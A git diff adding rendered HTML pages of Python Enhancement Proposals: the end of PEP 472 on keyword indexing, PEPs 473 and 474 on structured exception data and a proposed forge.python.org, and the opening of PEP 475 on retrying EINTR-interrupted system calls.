As briefly introduced in the previous analysis, the C interface would +potentially have to change to allow the new feature. Specifically, +PyObject_GetItem and related routines would have to accept an additional +PyObject *kw argument for Strategy “kwargs argument”. The remaining +strategies would not require a change in the C function signatures, but the +different nature of the passed object would potentially require adaptation.

+

Strategy “named tuple” would behave correctly without any change: the class +returned by the factory method in collections returns a subclass of tuple, +meaning that PyTuple_* functions can handle the resulting object.

+
+
+

Alternative Solutions

+

In this section, we present alternative solutions that would workaround the +missing feature and make the proposed enhancement not worth of implementation.

+
+

Use a method

+

One could keep the indexing as is, and use a traditional get() method for those +cases where basic indexing is not enough. This is a good point, but as already +reported in the introduction, methods have a different semantic weight from +indexing, and you can’t use slices directly in methods. Compare e.g. +a[1:3, Z=2] with a.get(slice(1,3), Z=2).

+

The authors however recognize this argument as compelling, and the advantage +in semantic expressivity of a keyword-based indexing may be offset by a rarely +used feature that does not bring enough benefit and may have limited adoption.

+
+
+

Emulate requested behavior by abusing the slice object

+

This extremely creative method exploits the slice objects’ behavior, provided +that one accepts to use strings (or instantiate properly named placeholder +objects for the keys), and accept to use “:” instead of “=”.

+
>>> a["K":3]
+slice('K', 3, None)
+>>> a["K":3, "R":4]
+(slice('K', 3, None), slice('R', 4, None))
+>>>
+
+
+

While clearly smart, this approach does not allow easy inquire of the key/value +pair, it’s too clever and esotheric, and does not allow to pass a slice as in +a[K=1:10:2].

+

However, Tim Delaney comments

+
+
“I really do think that a[b=c, d=e] should just be syntax sugar for +a['b':c, 'd':e]. It’s simple to explain, and gives the greatest backwards +compatibility. In particular, libraries that already abused slices in this +way will just continue to work with the new syntax.”
+

We think this behavior would produce inconvenient results. The library Pandas uses +strings as labels, allowing notation such as

+
>>> a[:, "A":"F"]
+
+
+

to extract data from column “A” to column “F”. Under the above comment, this notation +would be equally obtained with

+
>>> a[:, A="F"]
+
+
+

which is weird and collides with the intended meaning of keyword in indexing, that +is, specifying the axis through conventional names rather than positioning.

+
+
+

Pass a dictionary as an additional index

+
>>> a[1, 2, {"K": 3}]
+
+
+

this notation, although less elegant, can already be used and achieves similar +results. It’s evident that the proposed Strategy “New argument contents” can be +interpreted as syntactic sugar for this notation.

+
+
+
+

Additional Comments

+

Commenters also expressed the following relevant points:

+
+

Relevance of ordering of keyword arguments

+

As part of the discussion of this PEP, it’s important to decide if the ordering +information of the keyword arguments is important, and if indexes and keys can +be ordered in an arbitrary way (e.g. a[1,Z=3,2,R=4]). PEP 468 +tries to address the first point by proposing the use of an ordereddict, +however one would be inclined to accept that keyword arguments in indexing are +equivalent to kwargs in function calls, and therefore as of today equally +unordered, and with the same restrictions.

+
+
+

Need for homogeneity of behavior

+

Relative to Strategy “New argument contents”, a comment from Ian Cordasco +points out that

+
+
“it would be unreasonable for just one method to behave totally +differently from the standard behaviour in Python. It would be confusing for +only __getitem__ (and ostensibly, __setitem__) to take keyword +arguments but instead of turning them into a dictionary, turn them into +individual single-item dictionaries.” We agree with his point, however it must +be pointed out that __getitem__ is already special in some regards when it +comes to passed arguments.
+

Chris Angelico also states:

+
+
“it seems very odd to start out by saying “here, let’s give indexing the +option to carry keyword args, just like with function calls”, and then come +back and say “oh, but unlike function calls, they’re inherently ordered and +carried very differently”.” Again, we agree on this point. The most +straightforward strategy to keep homogeneity would be Strategy “kwargs +argument”, opening to a **kwargs argument on __getitem__.
+

One of the authors (Stefano Borini) thinks that only the “strict dictionary” +strategy is worth of implementation. It is non-ambiguous, simple, does not +force complex parsing, and addresses the problem of referring to axes either +by position or by name. The “options” use case is probably best handled with +a different approach, and may be irrelevant for this PEP. The alternative +“named tuple” is another valid choice.

+
+
+

Having .get() become obsolete for indexing with default fallback

+

Introducing a “default” keyword could make dict.get() obsolete, which would be +replaced by d["key", default=3]. Chris Angelico however states:

+
+
“Currently, you need to write __getitem__ (which raises an exception on +finding a problem) plus something else, e.g. get(), which returns a default +instead. By your proposal, both branches would go inside __getitem__, which +means they could share code; but there still need to be two branches.”
+

Additionally, Chris continues:

+
+
“There’ll be an ad-hoc and fairly arbitrary puddle of names (some will go +default=, others will say that’s way too long and go def=, except that +that’s a keyword so they’ll use dflt= or something…), unless there’s a +strong force pushing people to one consistent name.”.
+

This argument is valid but it’s equally valid for any function call, and is +generally fixed by established convention and documentation.

+
+
+

On degeneracy of notation

+

User Drekin commented: “The case of a[Z=3] and a[{"Z": 3}] is similar to +current a[1, 2] and a[(1, 2)]. Even though one may argue that the parentheses +are actually not part of tuple notation but are just needed because of syntax, +it may look as degeneracy of notation when compared to function call: f(1, 2) +is not the same thing as f((1, 2)).”.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0472.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0473/index.html b/pep-0473/index.html new file mode 100644 index 00000000000..ac27015d9ad --- /dev/null +++ b/pep-0473/index.html @@ -0,0 +1,386 @@ + + + + + + + + PEP 473 – Adding structured data to built-in exceptions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 473 – Adding structured data to built-in exceptions

+
+
Author:
+
Sebastian Kreft <skreft at deezer.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
29-Mar-2014
+
Post-History:
+

+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Exceptions like AttributeError, IndexError, KeyError, +LookupError, NameError, TypeError, and ValueError do not +provide all information required by programmers to debug and better understand +what caused them. +Furthermore, in some cases the messages even have slightly different formats, +which makes it really difficult for tools to automatically provide additional +information to diagnose the problem. +To tackle the former and to lay ground for the latter, it is proposed to expand +these exceptions so to hold both the offending and affected entities.

+
+
+

Rationale

+

The main issue this PEP aims to solve is the fact that currently error messages +are not that expressive and lack some key information to resolve the exceptions. +Additionally, the information present on the error message is not always in the +same format, which makes it very difficult for third-party libraries to +provide automated diagnosis of the error.

+

These automated tools could, for example, detect typos or display or log extra +debug information. These could be particularly useful when running tests or in a +long running application.

+

Although it is in theory possible to have such libraries, they need to resort to +hacks in order to achieve the goal. One such example is +python-improved-exceptions [1], which modifies the byte-code to keep references +to the possibly interesting objects and also parses the error messages to +extract information like types or names. Unfortunately, such approach is +extremely fragile and not portable.

+

A similar proposal [2] has been implemented for ImportError and in the same +fashion this idea has received support [3]. Additionally, almost 10 years ago +Guido asked in [11] to have a clean API to access the affected objects in +Exceptions like KeyError, AttributeError, NameError, and +IndexError. Similar issues and proposals ideas have been written in the +last year. Some other issues have been created, but despite receiving support +they finally get abandoned. References to the created issues are listed below:

+ +

To move forward with the development and to centralize the information and +discussion, this PEP aims to be a meta-issue summarizing all the above +discussions and ideas.

+
+
+

Examples

+
+

IndexError

+

The error message does not reference the list’s length nor the index used.

+
a = [1, 2, 3, 4, 5]
+a[5]
+IndexError: list index out of range
+
+
+
+
+

KeyError

+

By convention the key is the first element of the error’s argument, but there’s +no other information regarding the affected dictionary (keys types, size, etc.)

+
b = {'foo': 1}
+b['fo']
+KeyError: 'fo'
+
+
+
+
+

AttributeError

+

The object’s type and the offending attribute are part of the error message. +However, there are some different formats and the information is not always +available. Furthermore, although the object type is useful in some cases, given +the dynamic nature of Python, it would be much more useful to have a reference +to the object itself. Additionally the reference to the type is not fully +qualified and in some cases the type is just too generic to provide useful +information, for example in case of accessing a module’s attribute.

+
c = object()
+c.foo
+AttributeError: 'object' object has no attribute 'foo'
+
+import string
+string.foo
+AttributeError: 'module' object has no attribute 'foo'
+
+a = string.Formatter()
+a.foo
+AttributeError: 'Formatter' object has no attribute 'foo'
+
+
+
+
+

NameError

+

The error message provides typically the name.

+
foo = 1
+fo
+NameError: global name 'fo' is not defined
+
+
+
+
+

Other Cases

+

Issues are even harder to debug when the target object is the result of +another expression, for example:

+
a[b[c[0]]]
+
+
+

This issue is also related to the fact that opcodes only have line number +information and not the offset. This proposal would help in this case but not as +much as having offsets.

+
+
+
+

Proposal

+

Extend the exceptions AttributeError, IndexError, KeyError, +LookupError, NameError, TypeError, and ValueError with the +following:

+
    +
  • AttributeError: target w, attribute
  • +
  • IndexError: target w, key w, index (just an alias to +key)
  • +
  • KeyError: target w, key w
  • +
  • LookupError: target w, key w
  • +
  • NameError: name, scope?
  • +
  • TypeError: unexpected_type
  • +
  • ValueError: unexpected_value w
  • +
+

Attributes with the superscript w may need to be weak references [12] to +prevent any memory cycles. However, this may add an unnecessary extra +complexity as noted by R. David Murray [13]. This is specially true given that +builtin types do not support being weak referenced.

+

TODO(skreft): expand this with examples of corner cases.

+

To remain backwards compatible these new attributes will be optional and keyword +only.

+

It is proposed to add this information, rather than just improve the error, as +the former would allow new debugging frameworks and tools and also in the future +to switch to a lazy generated message. Generated messages are discussed in [2], +although they are not implemented at the moment. They would not only save some +resources, but also uniform the messages.

+

The stdlib will be then gradually changed so to start using these new +attributes.

+
+
+

Potential Uses

+

An automated tool could for example search for similar keys within the object, +allowing to display the following::

+
a = {'foo': 1}
+a['fo']
+KeyError: 'fo'. Did you mean 'foo'?
+
+foo = 1
+fo
+NameError: global name 'fo' is not defined. Did you mean 'foo'?
+
+
+

See [3] for the output a TestRunner could display.

+
+
+

Performance

+

Filling these new attributes would only require two extra parameters with data +already available so the impact should be marginal. However, it may need +special care for KeyError as the following pattern is already widespread.

+
try:
+  a[foo] = a[foo] + 1
+except:
+  a[foo] = 0
+
+
+

Note as well that storing these objects into the error itself would allow the +lazy generation of the error message, as discussed in [2].

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0473.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0474/index.html b/pep-0474/index.html new file mode 100644 index 00000000000..03e6b3fbd8f --- /dev/null +++ b/pep-0474/index.html @@ -0,0 +1,544 @@ + + + + + + + + PEP 474 – Creating forge.python.org | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 474 – Creating forge.python.org

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Withdrawn
+
Type:
+
Process
+
Created:
+
19-Jul-2014
+
Post-History:
+
19-Jul-2014, 08-Jan-2015, 01-Feb-2015
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes setting up a new PSF provided resource, forge.python.org, +as a location for maintaining various supporting repositories +(such as the repository for Python Enhancement Proposals) in a way that is +more accessible to new contributors, and easier to manage for core +developers.

+

This PEP does not propose any changes to the core development workflow +for CPython itself (see PEP 462 in relation to that).

+
+
+

PEP Withdrawal

+

This PEP has been withdrawn by the author +in favour of the GitLab based proposal in PEP 507.

+

If anyone else would like to take over championing this PEP, contact the +core-workflow mailing list

+
+
+

Proposal

+

This PEP proposes that an instance of the self-hosted Kallithea code +repository management system be deployed as “forge.python.org”.

+

Individual repositories (such as the developer guide or the PEPs repository) +may then be migrated from the existing hg.python.org infrastructure to the +new forge.python.org infrastructure on a case-by-case basis. Each migration +will need to decide whether to retain a read-only mirror on hg.python.org, +or whether to just migrate wholesale to the new location.

+

In addition to supporting read-only mirrors on hg.python.org, +forge.python.org will also aim to support hosting mirrors on popular +proprietary hosting sites like GitHub and BitBucket. The aim will be to +allow users familiar with these sites to submit and discuss pull requests +using their preferred workflow, with forge.python.org automatically bringing +those contributions over to the master repository.

+

Given the availability and popularity of commercially backed “free for open +source projects” repository hosting services, this would not be a general +purpose hosting site for arbitrary Python projects. The initial focus will be +specifically on CPython and other repositories currently hosted on +hg.python.org. In the future, this could potentially be expanded to +consolidating other PSF managed repositories that are currently externally +hosted to gain access to a pull request based workflow, such as the +repository for the python.org Django application. As with the initial +migrations, any such future migrations would be considered on a case-by-case +basis, taking into account the preferences of the primary users of each +repository.

+
+
+

Rationale

+

Currently, hg.python.org hosts more than just the core CPython repository, +it also hosts other repositories such as those for the CPython developer +guide and for Python Enhancement Proposals, along with various “sandbox” +repositories for core developer experimentation.

+

While the simple “pull request” style workflow made popular by code hosting +sites like GitHub and BitBucket isn’t adequate for the complex branching +model needed for parallel maintenance and development of the various +CPython releases, it’s a good fit for several of the ancillary projects +that surround CPython that we don’t wish to move to a proprietary hosting +site.

+

The key requirements proposed for a PSF provided software forge are:

+
    +
  • MUST support simple “pull request” style workflows
  • +
  • MUST support online editing for simple changes
  • +
  • MUST be backed by an active development organisation (community or +commercial)
  • +
  • MUST support self-hosting of the master repository on PSF infrastructure +without ongoing fees
  • +
+

Additional recommended requirements that are satisfied by this proposal, +but may be negotiable if a sufficiently compelling alternative is presented:

+
    +
  • SHOULD be a fully open source application written in Python
  • +
  • SHOULD support Mercurial (for consistency with existing tooling)
  • +
  • SHOULD support Git (to provide that option to users that prefer it)
  • +
  • SHOULD allow users of git and Mercurial clients to transparently +collaborate on the same repository
  • +
  • SHOULD allow users of GitHub and BitBucket to submit proposed changes using +the standard pull request workflows offered by those tools
  • +
  • SHOULD be open to customisation to meet the needs of CPython core +development, including providing a potential path forward for the +proposed migration to a core reviewer model in PEP 462
  • +
+

The preference for self-hosting without ongoing fees rules out the +free-as-in-beer providers like GitHub and BitBucket, in addition to the +various proprietary source code management offerings.

+

The preference for Mercurial support not only rules out GitHub, but also +other Git-only solutions like GitLab and Gitorious.

+

The hard requirement for online editing support rules out the Apache +Allura/HgForge combination.

+

The preference for a fully open source solution rules out RhodeCode.

+

Of the various options considered by the author of this proposal, that +leaves Kallithea SCM as the proposed +foundation for a forge.python.org service.

+

Kallithea is a full GPLv3 application (derived from the clearly +and unambiguously GPLv3 licensed components of RhodeCode) that is being +developed under the auspices of the Software Freedom Conservancy. The +Conservancy has affirmed that the +Kallithea codebase is completely and validly licensed under GPLv3. In +addition to their role in building the initial Kallithea community, the +Conservancy is also the legal home of both the Mercurial and Git projects. +Other SFC member projects that may be familiar to Python users include +Twisted, Gevent, BuildBot and PyPy.

+
+
+

Intended Benefits

+

The primary benefit of deploying Kallithea as forge.python.org is that +supporting repositories such as the developer guide and the PEP repo could +potentially be managed using pull requests and online editing. This would be +much simpler than the current workflow which requires PEP editors and +other core developers to act as intermediaries to apply updates suggested +by other users.

+

The richer administrative functionality would also make it substantially +easier to grant users access to particular repositories for collaboration +purposes, without having to grant them general access to the entire +installation. This helps lower barriers to entry, as trust can more +readily be granted and earned incrementally, rather than being an +all-or-nothing decision around granting core developer access.

+
+
+

Sustaining Engineering Considerations

+

Even with its current workflow, CPython itself remains one of the largest +open source projects in the world (in the +top 2% +of projects tracked on OpenHub). Unfortunately, we have been significantly +less effective at encouraging contributions to the projects that make up +CPython’s workflow infrastructure, including ensuring that our installations +track upstream, and that wherever feasible, our own customisations are +contributed back to the original project.

+

As such, a core component of this proposal is to actively engage with the +upstream Kallithea community to lower the barriers to working with and on +the Kallithea SCM, as well as with the PSF Infrastructure team to ensure +the forge.python.org service integrates cleanly with the PSF’s infrastructure +automation.

+

This approach aims to provide a number of key benefits:

+
    +
  • allowing those of us contributing to maintenance of this service to be +as productive as possible in the time we have available
  • +
  • offering a compelling professional development opportunity to those +volunteers that choose to participate in maintenance of this service
  • +
  • making the Kallithea project itself more attractive to other potential +users by making it as easy as possible to adopt, deploy and manage
  • +
  • as a result of the above benefits, attracting sufficient contributors both +in the upstream Kallithea community, and within the CPython infrastructure +community, to allow the forge.python.org service to evolve effectively to +meet changing developer expectations
  • +
+

Some initial steps have already been taken to address these sustaining +engineering concerns:

+
    +
  • Tymoteusz Jankowski has been working with Donald Stufft to work out what +would be involved +in deploying Kallithea using the PSF’s Salt based infrastructure automation.
  • +
  • Graham Dumpleton and I have been working on +making it easy +to deploy demonstration Kallithea instances to the free tier of Red Hat’s open +source hosting service, OpenShift Online. (See the comments on that post, or +the quickstart issue tracker for links to +Graham’s follow on work)
  • +
+

The next major step to be undertaken is to come up with a local development +workflow that allows contributors on Windows, Mac OS X and Linux to run +the Kallithea tests locally, without interfering with the operation of +their own system. The currently planned approach for this is to focus on +Vagrant, which is a popular automated virtual machine management system +specifically aimed at developers running local VMs for testing purposes. +The Vagrant based development guidelines +for OpenShift Origin provide an extended example of the kind of workflow this +approach enables. It’s also worth noting that Vagrant is one of the options +for working with a local build of the main python.org website.

+

If these workflow proposals end up working well for Kallithea, they may also +be worth proposing for use by the upstream projects backing other PSF and +CPython infrastructure services, including Roundup, BuildBot, and the main +python.org web site.

+
+
+

Personal Motivation

+

As of July 2015, I now work for Red Hat as a software development workflow +designer and process architect, focusing on the upstream developer experience +in Fedora. Two of the key pieces of that experience will be familiar to many +web service developers: Docker for local container management, and Vagrant for +cross-platform local development VM management. Spending time applying these +technologies in multiple upstream contexts helps provide additional insight +into what works well and what still needs further improvement to provide a good +software development experience that is well integrated on Fedora, but also +readily available on other Linux distributions, Windows, Mac OS X.

+

In relation to code review workflows in particular, the primary code review +workflow management tools I’ve used in my career are +Gerrit (for multi-step code review with fine-grained access control), GitHub +and BitBucket (for basic pull request based workflows), and Rietveld (for +CPython’s optional pre-commit reviews).

+

Kallithea is interesting as a base project to build, as it’s currently a +combined repo hosting and code review management platform, but doesn’t +directly integrate the two by offering online merges. This creates the +opportunity to blend the low barrier to entry benefits of the GitHub/BitBucket +pull request model with the mentoring and task hand-off benefits of Gerrit +in defining an online code merging model for Kallithea in collaboration with +the upstream Kallithea developers.

+
+
+

Technical Concerns and Challenges

+

Introducing a new service into the CPython infrastructure presents a number +of interesting technical concerns and challenges. This section covers several +of the most significant ones.

+
+

Service hosting

+

The default position of this PEP is that the new forge.python.org service +will be integrated into the existing PSF Salt infrastructure and hosted on +the PSF’s Rackspace cloud infrastructure.

+

However, other hosting options will also be considered, in particular, +possible deployment as a Kubernetes hosted web +service on either +Google Container Engine or +the next generation of Red Hat’s +OpenShift Online service, by using either +GCEPersistentDisk or the open source +GlusterFS distributed filesystem +to hold the source code repositories.

+
+
+

Ongoing infrastructure maintenance

+

Ongoing infrastructure maintenance is an area of concern within the PSF, +as we currently lack a system administrator mentorship program equivalent to +the Fedora Infrastructure Apprentice or +GNOME Infrastructure Apprentice +programs.

+

Instead, systems tend to be maintained largely by developers as a part-time +activity on top of their development related contributions, rather than +seeking to recruit folks that are more interested in operations (i.e. +keeping existing systems running well) than they are in development (i.e. +making changes to the services to provide new features or a better user +experience, or to address existing issues).

+

While I’d personally like to see the PSF operating such a program at some +point in the future, I don’t consider setting one up to be a +feasible near term goal. However, I do consider it feasible to continue +laying the groundwork for such a program by extending the PSF’s existing +usage of modern infrastructure technologies like OpenStack and Salt to +cover more services, as well as starting to explore the potential benefits of +containers and container platforms when it comes to maintaining and enhancing +PSF provided services.

+

I also plan to look into the question of whether or not an open source cloud +management platform like ManageIQ may help us +bring our emerging “cloud sprawl” problem across Rackspace, Google, Amazon +and other services more under control.

+
+
+

User account management

+

Ideally we’d like to be able to offer a single account that spans all +python.org services, including Kallithea, Roundup/Rietveld, PyPI and the +back end for the new python.org site, but actually implementing that would +be a distinct infrastructure project, independent of this PEP. (It’s also +worth noting that the fine-grained control of ACLs offered by such a +capability is a prerequisite for setting up an +effective system administrator mentorship program)

+

For the initial rollout of forge.python.org, we will likely create yet another +identity silo within the PSF infrastructure. A potentially superior +alternative would be to add support for python-social-auth to Kallithea, but actually +doing so would not be a requirement for the initial rollout of the service +(the main technical concern there is that Kallithea is a Pylons application +that has not yet been ported to Pyramid, so integration will require either +adding a Pylons backend to python-social-auth, or else embarking on the +Pyramid migration in Kallithea).

+
+ +
+

Integration with Roundup

+

Kallithea provides configurable issue tracker integration. This will need +to be set up appropriately to integrate with the Roundup issue tracker at +bugs.python.org before the initial rollout of the forge.python.org service.

+
+
+

Accepting pull requests on GitHub and BitBucket

+

The initial rollout of forge.python.org would support publication of read-only +mirrors, both on hg.python.org and other services, as that is a relatively +straightforward operation that can be implemented in a commit hook.

+

While a highly desirable feature, accepting pull requests on external +services, and mirroring them as submissions to the master repositories on +forge.python.org is a more complex problem, and would likely not be included +as part of the initial rollout of the forge.python.org service.

+
+
+

Transparent Git and Mercurial interoperability

+

Kallithea’s native support for both Git and Mercurial offers an opportunity +to make it relatively straightforward for developers to use the client +of their choice to interact with repositories hosted on forge.python.org.

+

This transparent interoperability does not exist yet, but running our own +multi-VCS repository hosting service provides the opportunity to make this +capability a reality, rather than passively waiting for a proprietary +provider to deign to provide a feature that likely isn’t in their commercial +interest. There’s a significant misalignment of incentives between open +source communities and commercial providers in this particular area, as even +though offering VCS client choice can significantly reduce community friction +by eliminating the need for projects to make autocratic decisions that force +particular tooling choices on potential contributors, top down enforcement +of tool selection (regardless of developer preference) is currently still +the norm in the corporate and other organisational environments that produce +GitHub and Atlassian’s paying customers.

+

Prior to acceptance, in the absence of transparent interoperability, this PEP +should propose specific recommendations for inclusion in the CPython +developer’s guide section for +git users for creating +pull requests against forge.python.org hosted Mercurial repositories.

+
+
+
+

Pilot Objectives and Timeline

+

[TODO: Update this section for Brett’s revised timeline, which aims to have +a CPython demo repository online by October 31st, to get a better indication +of future capabilities once CPython itself migrates over to the new +system, rather than just the support repos]

+

This proposal is part of Brett Cannon’s current evaluation +of improvement proposals for various aspects of the CPython development +workflow. Key dates in that timeline are:

+
    +
  • Feb 1: Draft proposal published (for Kallithea, this PEP)
  • +
  • Apr 8: Discussion of final proposals at Python Language Summit
  • +
  • May 1: Brett’s decision on which proposal to accept
  • +
  • Sep 13: Python 3.5 released, adopting new workflows for Python 3.6
  • +
+

If this proposal is selected for further development, it is proposed to start +with the rollout of the following pilot deployment:

+
    +
  • a reference implementation operational at kallithea-pilot.python.org, +containing at least the developer guide and PEP repositories. This will +be a “throwaway” instance, allowing core developers and other contributors +to experiment freely without worrying about the long term consequences for +the repository history.
  • +
  • read-only live mirrors of the Kallithea hosted repositories on GitHub and +BitBucket. As with the pilot service itself, these would be temporary repos, +to be discarded after the pilot period ends.
  • +
  • clear documentation on using those mirrors to create pull requests against +Kallithea hosted Mercurial repositories (for the pilot, this will likely +not include using the native pull request workflows of those hosted +services)
  • +
  • automatic linking of issue references in code review comments and commit +messages to the corresponding issues on bugs.python.org
  • +
  • draft updates to PEP 1 explaining the Kallithea-based PEP editing and +submission workflow
  • +
+

The following items would be needed for a production migration, but there +doesn’t appear to be an obvious way to trial an updated implementation as +part of the pilot:

+
    +
  • adjusting the PEP publication process and the developer guide publication +process to be based on the relocated Mercurial repos
  • +
+

The following items would be objectives of the overall workflow improvement +process, but are considered “desirable, but not essential” for the initial +adoption of the new service in September (if this proposal is the one +selected and the proposed pilot deployment is successful):

+
    +
  • allowing the use of python-social-auth to authenticate against the PSF +hosted Kallithea instance
  • +
  • allowing the use of the GitHub and BitBucket pull request workflows to +submit pull requests to the main Kallithea repo
  • +
  • allowing easy triggering of forced BuildBot runs based on Kallithea hosted +repos and pull requests (prior to the implementation of PEP 462, this +would be intended for use with sandbox repos rather than the main CPython +repo)
  • +
+
+
+

Future Implications for CPython Core Development

+

The workflow requirements for the main CPython development repository are +significantly more complex than those for the repositories being discussed +in this PEP. These concerns are covered in more detail in PEP 462.

+

Given Guido’s recommendation to replace Rietveld with a more actively +maintained code review system, my current plan is to rewrite that PEP to +use Kallithea as the proposed glue layer, with enhanced Kallithea pull +requests eventually replacing the current practice of uploading patche files +directly to the issue tracker.

+

I’ve also started working with Pierre Yves-David on a custom Mercurial +extension +that automates some aspects of the CPython core development workflow.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0474.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0475/index.html b/pep-0475/index.html new file mode 100644 index 00000000000..61e4dadc9ca --- /dev/null +++ b/pep-0475/index.html @@ -0,0 +1,560 @@ + + + + + + + + PEP 475 – Retry system calls failing with EINTR | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 475 – Retry system calls failing with EINTR

+
+
Author:
+
Charles-François Natali <cf.natali at gmail.com>, Victor Stinner <vstinner at python.org>
+
BDFL-Delegate:
+
Antoine Pitrou <solipsis at pitrou.net>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
29-Jul-2014
+
Python-Version:
+
3.5
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

System call wrappers provided in the standard library should be retried +automatically when they fail with EINTR, to relieve application code +from the burden of doing so.

+

By system calls, we mean the functions exposed by the standard C library +pertaining to I/O or handling of other system resources.

+
+
+

Rationale

+
+

Interrupted system calls

+

On POSIX systems, signals are common. Code calling system calls must be +prepared to handle them. Examples of signals:

+
    +
  • The most common signal is SIGINT, the signal sent when CTRL+c is +pressed. By default, Python raises a KeyboardInterrupt exception +when this signal is received.
  • +
  • When running subprocesses, the SIGCHLD signal is sent when a +child process exits.
  • +
  • Resizing the terminal sends the SIGWINCH signal to the +applications running in the terminal.
  • +
  • Putting the application in background (ex: press CTRL-z and then +type the bg command) sends the SIGCONT signal.
  • +
+

Writing a C signal handler is difficult: only “async-signal-safe” +functions can be called (for example, printf() and malloc() +are not async-signal safe), and there are issues with reentrancy. +Therefore, when a signal is received by a process during the execution +of a system call, the system call can fail with the EINTR error to +give the program an opportunity to handle the signal without the +restriction on signal-safe functions.

+

This behaviour is system-dependent: on certain systems, using the +SA_RESTART flag, some system calls are retried automatically instead +of failing with EINTR. Regardless, Python’s signal.signal() +function clears the SA_RESTART flag when setting the signal handler: +all system calls will probably fail with EINTR in Python.

+

Since receiving a signal is a non-exceptional occurrence, robust POSIX code +must be prepared to handle EINTR (which, in most cases, means +retry in a loop in the hope that the call eventually succeeds). +Without special support from Python, this can make application code +much more verbose than it needs to be.

+
+
+

Status in Python 3.4

+

In Python 3.4, handling the InterruptedError exception (EINTR’s +dedicated exception class) is duplicated at every call site on a case-by-case +basis. Only a few Python modules actually handle this exception, +and fixes usually took several years to cover a whole module. Example of +code retrying file.read() on InterruptedError:

+
while True:
+    try:
+        data = file.read(size)
+        break
+    except InterruptedError:
+        continue
+
+
+

List of Python modules in the standard library which handle +InterruptedError:

+
    +
  • asyncio
  • +
  • asyncore
  • +
  • io, _pyio
  • +
  • multiprocessing
  • +
  • selectors
  • +
  • socket
  • +
  • socketserver
  • +
  • subprocess
  • +
+

Other programming languages like Perl, Java and Go retry system calls +failing with EINTR at a lower level, so that libraries and applications +needn’t bother.

+
+
+

Use Case 1: Don’t Bother With Signals

+

In most cases, you don’t want to be interrupted by signals and you +don’t expect to get InterruptedError exceptions. For example, do +you really want to write such complex code for a “Hello World” +example?

+
while True:
+    try:
+        print("Hello World")
+        break
+    except InterruptedError:
+        continue
+
+
+

InterruptedError can happen in unexpected places. For example, +os.close() and FileIO.close() may raise InterruptedError: +see the article close() and EINTR.

+

The Python issues related to EINTR section below gives examples of +bugs caused by EINTR.

+

The expectation in this use case is that Python hides the +InterruptedError and retries system calls automatically.

+
+
+

Use Case 2: Be notified of signals as soon as possible

+

Sometimes yet, you expect some signals and you want to handle them as +soon as possible. For example, you may want to immediately quit a +program using the CTRL+c keyboard shortcut.

+

Besides, some signals are not interesting and should not disrupt the +application. There are two options to interrupt an application on +only some signals:

+
    +
  • Set up a custom signal handler which raises an exception, such as +KeyboardInterrupt for SIGINT.
  • +
  • Use a I/O multiplexing function like select() together with Python’s +signal wakeup file descriptor: see the function signal.set_wakeup_fd().
  • +
+

The expectation in this use case is for the Python signal handler to be +executed timely, and the system call to fail if the handler raised an +exception – otherwise restart.

+
+
+
+

Proposal

+

This PEP proposes to handle EINTR and retries at the lowest level, i.e. +in the wrappers provided by the stdlib (as opposed to higher-level +libraries and applications).

+

Specifically, when a system call fails with EINTR, its Python wrapper +must call the given signal handler (using PyErr_CheckSignals()). +If the signal handler raises an exception, the Python wrapper bails out +and fails with the exception.

+

If the signal handler returns successfully, the Python wrapper retries the +system call automatically. If the system call involves a timeout parameter, +the timeout is recomputed.

+
+

Modified functions

+

Example of standard library functions that need to be modified to comply +with this PEP:

+
    +
  • open(), os.open(), io.open()
  • +
  • functions of the faulthandler module
  • +
  • os functions:
      +
    • os.fchdir()
    • +
    • os.fchmod()
    • +
    • os.fchown()
    • +
    • os.fdatasync()
    • +
    • os.fstat()
    • +
    • os.fstatvfs()
    • +
    • os.fsync()
    • +
    • os.ftruncate()
    • +
    • os.mkfifo()
    • +
    • os.mknod()
    • +
    • os.posix_fadvise()
    • +
    • os.posix_fallocate()
    • +
    • os.pread()
    • +
    • os.pwrite()
    • +
    • os.read()
    • +
    • os.readv()
    • +
    • os.sendfile()
    • +
    • os.wait3()
    • +
    • os.wait4()
    • +
    • os.wait()
    • +
    • os.waitid()
    • +
    • os.waitpid()
    • +
    • os.write()
    • +
    • os.writev()
    • +
    • special cases: os.close() and os.dup2() now ignore EINTR error, +the syscall is not retried
    • +
    +
  • +
  • select.select(), select.poll.poll(), select.epoll.poll(), +select.kqueue.control(), select.devpoll.poll()
  • +
  • socket.socket() methods:
      +
    • accept()
    • +
    • connect() (except for non-blocking sockets)
    • +
    • recv()
    • +
    • recvfrom()
    • +
    • recvmsg()
    • +
    • send()
    • +
    • sendall()
    • +
    • sendmsg()
    • +
    • sendto()
    • +
    +
  • +
  • signal.sigtimedwait(), signal.sigwaitinfo()
  • +
  • time.sleep()
  • +
+

(Note: the selector module already retries on InterruptedError, but it +doesn’t recompute the timeout yet)

+

